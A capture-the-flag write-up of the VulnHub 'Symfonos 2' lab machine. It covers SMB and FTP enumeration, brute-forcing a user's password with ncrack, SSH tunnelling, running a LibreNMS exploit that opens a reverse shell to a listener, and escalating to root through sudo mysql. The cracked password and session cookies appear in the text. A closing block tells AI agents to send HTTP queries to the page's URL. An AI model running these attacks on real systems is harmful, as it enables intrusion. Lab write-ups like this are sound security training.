# Symfonos 2 ## Enumeration ### Nmap ``` nmap -sC -sV -oA nmap/sym2 192.168.43.97 ``` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 10:27 EDT Nmap scan report for symfonos2 (192.168.43.97) Host is up (0.00014s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA) | 256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA) |_ 256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519) 80/tcp open http WebFS httpd 1.21 |_http-server-header: webfs/1.21 |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP) MAC Address: 00:0C:29:03:48:23 (VMware) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 1s |_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.5.16-Debian) | Computer name: symfonos2 | NetBIOS computer name: SYMFONOS2\x00 | Domain name: \x00 | FQDN: symfonos2 |_ System time: 2020-05-15T09:27:31-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-05-15T14:27:31 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.14 seconds ``` ### Enum4linux ``` enum4linux -a 192.168.43.97 ``` ``` Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 15 11:08:47 2020 ========================== | Target Information | ========================== Target ........... 192.168.43.97 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ===================================================== | Enumerating Workgroup/Domain on 192.168.43.97 | ===================================================== [+] Got domain/workgroup name: WORKGROUP ============================================= | Nbtstat Information for 192.168.43.97 | ============================================= Looking up status of 192.168.43.97 SYMFONOS2 <00> - B Workstation Service SYMFONOS2 <03> - B Messenger Service SYMFONOS2 <20> - B File Server Service ..__MSBROWSE__. <01> - B Master Browser WORKGROUP <00> - B Domain/Workgroup Name WORKGROUP <1d> - B Master Browser WORKGROUP <1e> - B Browser Service Elections MAC Address = 00-00-00-00-00-00 ====================================== | Session Check on 192.168.43.97 | ====================================== [+] Server 192.168.43.97 allows sessions using username '', password '' ============================================ | Getting domain SID for 192.168.43.97 | ============================================ Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ======================================= | OS information on 192.168.43.97 | ======================================= Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 192.168.43.97 from smbclient: [+] Got OS info for 192.168.43.97 from srvinfo: SYMFONOS2 Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian platform_id : 500 os version : 6.1 server type : 0x809a03 ============================== | Users on 192.168.43.97 | ============================== Use of uninitialized value $users in print at ./enum4linux.pl line 874. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877. Use of uninitialized value $users in print at ./enum4linux.pl line 888. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890. ========================================== | Share Enumeration on 192.168.43.97 | ========================================== Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers anonymous Disk IPC$ IPC IPC Service (Samba 4.5.16-Debian) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP SYMFONOS2 [+] Attempting to map shares on 192.168.43.97 //192.168.43.97/print$ Mapping: DENIED, Listing: N/A //192.168.43.97/anonymous Mapping: OK, Listing: OK //192.168.43.97/IPC$ [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* ===================================================== | Password Policy Information for 192.168.43.97 | ===================================================== [E] Unexpected error from polenum: [+] Attaching to 192.168.43.97 using a NULL share [+] Trying protocol 139/SMB... [!] Protocol failed: Missing required parameter 'digestmod'. [+] Trying protocol 445/SMB... [!] Protocol failed: Missing required parameter 'digestmod'. [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 =============================== | Groups on 192.168.43.97 | =============================== [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ======================================================================== | Users on 192.168.43.97 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================== [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-629329663-2933547119-2337616968 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\aeolus (Local User) S-1-22-1-1001 Unix User\cronus (Local User) [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-500 *unknown*\*unknown* (8) S-1-5-32-501 *unknown*\*unknown* (8) S-1-5-32-502 *unknown*\*unknown* (8) S-1-5-32-503 *unknown*\*unknown* (8) S-1-5-32-504 *unknown*\*unknown* (8) S-1-5-32-505 *unknown*\*unknown* (8) S-1-5-32-506 *unknown*\*unknown* (8) S-1-5-32-507 *unknown*\*unknown* (8) S-1-5-32-508 *unknown*\*unknown* (8) S-1-5-32-509 *unknown*\*unknown* (8) S-1-5-32-510 *unknown*\*unknown* (8) S-1-5-32-511 *unknown*\*unknown* (8) S-1-5-32-512 *unknown*\*unknown* (8) S-1-5-32-513 *unknown*\*unknown* (8) S-1-5-32-514 *unknown*\*unknown* (8) S-1-5-32-515 *unknown*\*unknown* (8) S-1-5-32-516 *unknown*\*unknown* (8) S-1-5-32-517 *unknown*\*unknown* (8) S-1-5-32-518 *unknown*\*unknown* (8) S-1-5-32-519 *unknown*\*unknown* (8) S-1-5-32-520 *unknown*\*unknown* (8) S-1-5-32-521 *unknown*\*unknown* (8) S-1-5-32-522 *unknown*\*unknown* (8) S-1-5-32-523 *unknown*\*unknown* (8) S-1-5-32-524 *unknown*\*unknown* (8) S-1-5-32-525 *unknown*\*unknown* (8) S-1-5-32-526 *unknown*\*unknown* (8) S-1-5-32-527 *unknown*\*unknown* (8) S-1-5-32-528 *unknown*\*unknown* (8) S-1-5-32-529 *unknown*\*unknown* (8) S-1-5-32-530 *unknown*\*unknown* (8) S-1-5-32-531 *unknown*\*unknown* (8) S-1-5-32-532 *unknown*\*unknown* (8) S-1-5-32-533 *unknown*\*unknown* (8) S-1-5-32-534 *unknown*\*unknown* (8) S-1-5-32-535 *unknown*\*unknown* (8) S-1-5-32-536 *unknown*\*unknown* (8) S-1-5-32-537 *unknown*\*unknown* (8) S-1-5-32-538 *unknown*\*unknown* (8) S-1-5-32-539 *unknown*\*unknown* (8) S-1-5-32-540 *unknown*\*unknown* (8) S-1-5-32-541 *unknown*\*unknown* (8) S-1-5-32-542 *unknown*\*unknown* (8) S-1-5-32-543 *unknown*\*unknown* (8) S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) S-1-5-32-1000 *unknown*\*unknown* (8) S-1-5-32-1001 *unknown*\*unknown* (8) S-1-5-32-1002 *unknown*\*unknown* (8) S-1-5-32-1003 *unknown*\*unknown* (8) S-1-5-32-1004 *unknown*\*unknown* (8) S-1-5-32-1005 *unknown*\*unknown* (8) S-1-5-32-1006 *unknown*\*unknown* (8) S-1-5-32-1007 *unknown*\*unknown* (8) S-1-5-32-1008 *unknown*\*unknown* (8) S-1-5-32-1009 *unknown*\*unknown* (8) S-1-5-32-1010 *unknown*\*unknown* (8) S-1-5-32-1011 *unknown*\*unknown* (8) S-1-5-32-1012 *unknown*\*unknown* (8) S-1-5-32-1013 *unknown*\*unknown* (8) S-1-5-32-1014 *unknown*\*unknown* (8) S-1-5-32-1015 *unknown*\*unknown* (8) S-1-5-32-1016 *unknown*\*unknown* (8) S-1-5-32-1017 *unknown*\*unknown* (8) S-1-5-32-1018 *unknown*\*unknown* (8) S-1-5-32-1019 *unknown*\*unknown* (8) S-1-5-32-1020 *unknown*\*unknown* (8) S-1-5-32-1021 *unknown*\*unknown* (8) S-1-5-32-1022 *unknown*\*unknown* (8) S-1-5-32-1023 *unknown*\*unknown* (8) S-1-5-32-1024 *unknown*\*unknown* (8) S-1-5-32-1025 *unknown*\*unknown* (8) S-1-5-32-1026 *unknown*\*unknown* (8) S-1-5-32-1027 *unknown*\*unknown* (8) S-1-5-32-1028 *unknown*\*unknown* (8) S-1-5-32-1029 *unknown*\*unknown* (8) S-1-5-32-1030 *unknown*\*unknown* (8) S-1-5-32-1031 *unknown*\*unknown* (8) S-1-5-32-1032 *unknown*\*unknown* (8) S-1-5-32-1033 *unknown*\*unknown* (8) S-1-5-32-1034 *unknown*\*unknown* (8) S-1-5-32-1035 *unknown*\*unknown* (8) S-1-5-32-1036 *unknown*\*unknown* (8) S-1-5-32-1037 *unknown*\*unknown* (8) S-1-5-32-1038 *unknown*\*unknown* (8) S-1-5-32-1039 *unknown*\*unknown* (8) S-1-5-32-1040 *unknown*\*unknown* (8) S-1-5-32-1041 *unknown*\*unknown* (8) S-1-5-32-1042 *unknown*\*unknown* (8) S-1-5-32-1043 *unknown*\*unknown* (8) S-1-5-32-1044 *unknown*\*unknown* (8) S-1-5-32-1045 *unknown*\*unknown* (8) S-1-5-32-1046 *unknown*\*unknown* (8) S-1-5-32-1047 *unknown*\*unknown* (8) S-1-5-32-1048 *unknown*\*unknown* (8) S-1-5-32-1049 *unknown*\*unknown* (8) S-1-5-32-1050 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-5-21-629329663-2933547119-2337616968 and logon username '', password '' S-1-5-21-629329663-2933547119-2337616968-500 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-501 SYMFONOS2\nobody (Local User) S-1-5-21-629329663-2933547119-2337616968-502 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-503 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-504 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-505 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-506 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-507 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-508 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-509 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-510 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-511 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-512 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-513 SYMFONOS2\None (Domain Group) S-1-5-21-629329663-2933547119-2337616968-514 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-515 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-516 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-517 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-518 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-519 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-520 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-521 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-522 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-523 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-524 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-525 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-526 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-527 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-528 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-529 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-530 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-531 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-532 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-533 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-534 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-535 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-536 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-537 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-538 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-539 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-540 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-541 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-542 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-543 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-544 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-545 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-546 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-547 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-548 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-549 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-550 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1000 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1001 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1002 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1003 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1004 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1005 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1006 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1007 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1008 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1009 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1010 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1011 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1012 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1013 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1014 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1015 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1016 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1017 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1018 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1019 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1020 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1021 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1022 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1023 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1024 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1025 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1026 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1027 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1028 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1029 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1030 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1031 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1032 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1033 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1034 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1035 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1036 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1037 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1038 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1039 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1040 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1041 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1042 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1043 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1044 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1045 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1046 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1047 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1048 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1049 *unknown*\*unknown* (8) S-1-5-21-629329663-2933547119-2337616968-1050 *unknown*\*unknown* (8) ============================================== | Getting printer info for 192.168.43.97 | ============================================== No printers returned. enum4linux complete on Fri May 15 11:09:08 2020 ``` We can see that anonymous shared folder here ![](/files/-M7OGXL092f8zC8PWlyP) We then can use smbclient to see what's inside. ### smblient ``` smbclient //192.168.43.97/anonymous ``` We can then ls to list all the available files inside the anonymous folder, then we saw a backup folder, change directory to that folder and get the log.txt by typing get log.txt ![](/files/-M7OH92On_teF2p2vXMM) This is the content of log.txt ``` root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak root@symfonos2:~# cat /etc/samba/smb.conf # # Sample configuration file for the Samba suite for Debian GNU/Linux. # # # This is the main Samba configuration file. You should read the # smb.conf(5) manual page in order to understand the options listed # here. Samba has a huge number of configurable options most of which # are not shown in this example # # Some options that are often worth tuning have been included as # commented-out examples in this file. # - When such options are commented with ";", the proposed setting # differs from the default Samba behaviour # - When commented with "#", the proposed setting is the default # behaviour of Samba but the option is considered important # enough to be mentioned here # # NOTE: Whenever you modify this file you should run the command # "testparm" to check that you have not made any basic syntactic # errors. #======================= Global Settings ======================= [global] ## Browsing/Identification ### # Change this to the workgroup/NT-domain name your Samba server will part of workgroup = WORKGROUP # Windows Internet Name Serving Support Section: # WINS Support - Tells the NMBD component of Samba to enable its WINS Server # wins support = no # WINS Server - Tells the NMBD components of Samba to be a WINS Client # Note: Samba can be either a WINS Server, or a WINS Client, but NOT both ; wins server = w.x.y.z # This will prevent nmbd to search for NetBIOS names through DNS. dns proxy = no #### Networking #### # The specific set of interfaces / networks to bind to # This can be either the interface name or an IP address/netmask; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # Only bind to the named interfaces and/or networks; you must use the # 'interfaces' option above to use this. # It is recommended that you enable this feature if your Samba machine is # not protected by a firewall or is a firewall itself. However, this # option cannot handle dynamic or non-broadcast interfaces correctly. ; bind interfaces only = yes #### Debugging/Accounting #### # This tells Samba to use a separate log file for each machine # that connects log file = /var/log/samba/log.%m # Cap the size of the individual log files (in KiB). max log size = 1000 # If you want Samba to only log through syslog then set the following # parameter to 'yes'. # syslog only = no # We want Samba to log a minimum amount of information to syslog. Everything # should go to /var/log/samba/log.{smbd,nmbd} instead. If you want to log # through syslog you should set the following parameter to something higher. syslog = 0 # Do something sensible when Samba crashes: mail the admin a backtrace panic action = /usr/share/samba/panic-action %d ####### Authentication ####### # Server role. Defines in which mode Samba will operate. Possible # values are "standalone server", "member server", "classic primary # domain controller", "classic backup domain controller", "active # directory domain controller". # # Most people will want "standalone sever" or "member server". # Running as "active directory domain controller" will require first # running "samba-tool domain provision" to wipe databases and create a # new domain. server role = standalone server # If you are using encrypted passwords, Samba will need to know what # password database type you are using. passdb backend = tdbsam obey pam restrictions = yes # This boolean parameter controls whether Samba attempts to sync the Unix # password with the SMB password when the encrypted SMB password in the # passdb is changed. unix password sync = yes # For Unix password sync to work on a Debian GNU/Linux system, the following # parameters must be set (thanks to Ian Kahan < for # sending the correct chat script for the passwd program in Debian Sarge). passwd program = /usr/bin/passwd %u passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* . # This boolean controls whether PAM will be used for password changes # when requested by an SMB client instead of the program listed in # 'passwd program'. The default is 'no'. pam password change = yes # This option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user ########## Domains ########### # # The following settings only takes effect if 'server role = primary # classic domain controller', 'server role = backup domain controller' # or 'domain logons' is set # # It specifies the location of the user's # profile directory from the client point of view) The following # required a [profiles] share to be setup on the samba server (see # below) ; logon path = \\%N\profiles\%U # Another common choice is storing the profile in the user's home directory # (this is Samba's default) # logon path = \\%N\%U\profile # The following setting only takes effect if 'domain logons' is set # It specifies the location of a user's home directory (from the client # point of view) ; logon drive = H: # logon home = \\%N\%U # The following setting only takes effect if 'domain logons' is set # It specifies the script to run during logon. The script must be stored # in the [netlogon] share # NOTE: Must be store in 'DOS' file format convention ; logon script = logon.cmd # This allows Unix users to be created on the domain controller via the SAMR # RPC pipe. The example command creates a user account with a disabled Unix # password; please adapt to your needs ; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u # This allows machine accounts to be created on the domain controller via the # SAMR RPC pipe. # The following assumes a "machines" group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u # This allows Unix groups to be created on the domain controller via the SAMR # RPC pipe. ; add group script = /usr/sbin/addgroup --force-badname %g ############ Misc ############ # Using the following line enables you to customise your configuration # on a per machine basis. The %m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf.%m # Some defaults for winbind (make sure you're not using the ranges # for something else.) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # Setup usershare options to enable non-root users to share folders # with the net usershare command. # Maximum number of usershare. 0 (default) means that usershare is disabled. ; usershare max shares = 100 # Allow users who've been granted usershare privileges to create # public shares, not just authenticated ones usershare allow guests = yes #======================= Share Definitions ======================= [homes] comment = Home Directories browseable = no # By default, the home directories are exported read-only. Change the # next parameter to 'no' if you want to be able to write to them. read only = yes # File creation mask is set to 0700 for security reasons. If you want to # create files with group=rw permissions, set next parameter to 0775. create mask = 0700 # Directory creation mask is set to 0700 for security reasons. If you want to # create dirs. with group=rw permissions, set next parameter to 0775. directory mask = 0700 # By default, \\server\username shares can be connected to by anyone # with access to the samba server. # The following parameter makes sure that only "username" can connect # to \\server\username # This might need tweaking when using external authentication schemes valid users = %S # Un-comment the following and create the netlogon directory for Domain Logons # (you need to configure Samba to act as a domain controller too.) ;[netlogon] ; comment = Network Logon Service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes # Un-comment the following and create the profiles directory to store # users profiles (see the "logon path" option above) # (you need to configure Samba to act as a domain controller too.) # The path below should be writable by all users so that their # profile directory may be created the first time they log on ;[profiles] ; comment = Users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [printers] comment = All Printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 # Windows clients look for this share name as a source of downloadable # printer drivers [print$] comment = Printer Drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no # Uncomment to allow remote administration of Windows print drivers. # You may need to replace 'lpadmin' with the name of the group your # admin users are members of. # Please note that you also need to set appropriate Unix permissions # to the drivers directory for these users to have write rights in it ; write list = root, @lpadmin [anonymous] path = /home/aeolus/share browseable = yes read only = yes guest ok = yes root@symfonos2:~# cat /usr/local/etc/proftpd.conf # This is a basic ProFTPD configuration file (rename it to # 'proftpd.conf' for actual use. It establishes a single server # and a single anonymous login. It assumes that you have a user/group # "nobody" and "ftp" for normal operation and anon. ServerName "ProFTPD Default Installation" ServerType standalone DefaultServer on # Port 21 is the standard FTP port. Port 21 # Don't use IPv6 support by default. UseIPv6 off # Umask 022 is a good standard umask to prevent new dirs and files # from being group and world writable. Umask 022 # To prevent DoS attacks, set the maximum number of child processes # to 30. If you need to allow more than 30 concurrent connections # at once, simply increase this value. Note that this ONLY works # in standalone mode, in inetd mode you should use an inetd server # that allows you to limit maximum number of processes per service # (such as xinetd). MaxInstances 30 # Set the user and group under which the server will run. User aeolus Group aeolus # To cause every FTP user to be "jailed" (chrooted) into their home # directory, uncomment this line. #DefaultRoot ~ # Normally, we want files to be overwriteable. AllowOverwrite on # Bar use of SITE CHMOD by default DenyAll # A basic anonymous configuration, no upload directories. If you do not # want anonymous users, simply delete this entire section. User ftp Group ftp # We want clients to be able to login with "anonymous" as well as "ftp" UserAlias anonymous ftp # Limit the maximum number of anonymous logins MaxClients 10 # We want 'welcome.msg' displayed at login, and '.message' displayed # in each newly chdired directory. #DisplayLogin welcome.msg #DisplayChdir .message # Limit WRITE everywhere in the anonymous chroot DenyAll ``` ![](/files/-M7OIJHiN4td0BhhqiRy) As we can see here we have a user called aeolus, so maybe we can brute force the ssh login using hydra ## Exploitation ### ncrack ``` ncrack -v -u aeolus -P /usr/share/wordlists/rockyou.txt ftp://192.168.43.97 ``` ![](/files/-M7RfPTKy-oSJ5kdL4ta) We can see the password for the user `aeolus` is `sergioteamo` ### ftp After that we can use ftp to login ``` ftp 192.168.43.97 ``` ![](/files/-M7Rf73GddNEtQtLJdzo) Then I realized that we can ssh to the user to login into the user account. ### ssh ``` ssh aeolus@192.168.43.97 ``` ![](/files/-M7RfhxFLUvx5zwrdNWB) I been looking for a lot of directories and I can't seem to find a way. After looking at walk-through, I found out that there is a `apache` directory navigate to the `/etc/apache`, we can find a few folders and I go into the sites-enabled folder and found a file called `librenms.conf` `cat` that file and we find out this. ![](/files/-M7RgWc_r9PMkmTk592J) we can see that there is a server running at localhost port 8080. We now need to port forward so that we can access the shell by using ssh tunneling. ### ssh tunneling ``` ssh -L 9000:localhost:8080 aeolus@192.168.43.97 ``` ![](/files/-M7RgwqhDTcbUQUs_X-2) Then we can use our browser to browse the web-page. ![](/files/-M7RiFq0BdtRs1zxRjnk) ### Exploit it is LibreNMS. I went to searchsploit and did a quick lookup and got the exploit ![](/files/-M7RiPjRPZtaWcJaDzPz) After that, copy the exploit to a directory and set up the exploit ![](/files/-M7Ribq5M2kjWwi_ghUt) The exploit actually requires the URL, cookies and remote host and port. I use BurpSuite to intercept the traffic and get the cookies from it ![](/files/-M7RiyrpE9s3Z1gyQFFN) Before run the command, remember to set up a listener on our machine Command should looks like this ``` python 47044.py http://localhost:9000 "XSRF-TOKEN=eyJpdiI6InJXNnlUNWVmaDZxbVJDQ3JjY2tVZEE9PSIsInZhbHVlIjoidFh0VGhjditaNm9YNWxnaGgxVHIranBiZzBTTTlEYUgzckRiXC9KK0pBT2htXC9cL0FKVEVIYkNwUkZuTmNvK3R3cGdpbEFXeisyTUhqQVBtXC9nU0t5VHh3PT0iLCJtYWMiOiJjNTU1NjcxYzc3Y2Q3ZjBhYjU5NzBhZDA2ZGY0MmI5OWQ2Yzc5N2MyOTcxMWY4YjUzZWJlYzFiZDI3NTJhOWUxIn0%3D; librenms_session=eyJpdiI6IkY3bVU4d2lnSCtTdmlrRjJ1bjRSeUE9PSIsInZhbHVlIjoiSEsxOHhDXC91QytSSmcyMHBJdEkrcUlmSVlrR29VaGp2ckxqQ0I5d1poWlwvQk0rRTBNRnJjQVdWYU5SdENrb1J0Z2VTNnlFS0FQdHdYeUhoQzNvVTE0dz09IiwibWFjIjoiNDRjYTQ4ZDk5NTM2Y2FkNDI4NzAwNDhhMjg2MjRlMTk3MTMzNzIzM2Q2NDI4NjYyNjQ2NjcwZWJmZDcyN2E2YyJ9; PHPSESSID=2jmu3np8ppkk80uu94b620rnc5" 192.168.43.182 5555 ``` ![](/files/-M7Rkdv71b3jXxi3q7T0) We successfully connected to the user `cronus` ![](/files/-M7RkqZ0He_G4xVNt8k7) ## Privilege Escalation We first get a proper shell by typing ``` python -c 'import pty; pty.spawn("/bin/bash")' ``` When we type sudo -l, it will show this to us. ![](/files/-M7RlDx3GQpOdN826Alc) Thanks to this [website](https://gtfobins.github.io/) that my senior sent to me, I manage to find a suitable command to get root from it ``` sudo mysql -e '\! /bin/sh' ``` ![](/files/-M7RleGfs02uCkCbe6pv) Got root access ! ![](/files/-M7Rll4MRmBoFp8jLmOM) Congratulation! --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://choochisiang.gitbook.io/report/vulnhub/symfonos/symfonos-2.md?ask= ``` The question should be specific, self-contained, and written in 